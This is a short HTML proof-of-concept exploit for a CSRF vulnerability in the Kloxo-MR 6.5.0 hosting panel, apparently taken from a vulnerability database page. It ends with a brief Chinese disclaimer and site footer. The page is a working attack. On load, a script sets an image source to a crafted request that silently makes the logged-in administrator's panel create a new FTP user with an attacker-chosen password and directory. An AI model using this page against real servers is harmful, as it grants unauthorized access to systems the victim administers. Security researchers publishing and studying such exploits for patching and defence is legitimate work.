<html> <head><title>Kloxo-MR demo</title></head> <script type="text/javascript"> function yurudi(){ /////////////////////////////////////////////////////////// //Kloxo-MR 6.5.0 CSRF Vulnerability // //Author:Necmettin COSKUN => twitter.com/@babayarisi // //Blog: http://www.ncoskun.com | http://www.grisapka.org // /////////////////////////////////////////////////////////// //Remote host var host="victim.com"; //New Ftp Username var username="demouser"; //New Ftp Password var pass="12345678"; //This creates new folder under admin dir. /admin/yourfolder var dir="demodirectory"; //If necessary only modify http to https ;) var urlson="http://"+host+":7778//display.php?frm_o_cname=ftpuser&frm_dttype&frm_ftpuser_c_nname="+username+"&frm_ftpuser_c_complete_name_f=--direct--&frm_ftpuser_c_password="+pass+"&frm_confirm_password="+pass+"&frm_ftpuser_c_directory="+dir+"&frm_ftpuser_c_ftp_disk_usage&frm_action=add"; document.getElementById('demoexploit').src=urlson; } </script> <body onload="yurudi();"> <img id="demoexploit" src=""></img> </body> </html>
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
京公网安备 11010502034610号
暂无评论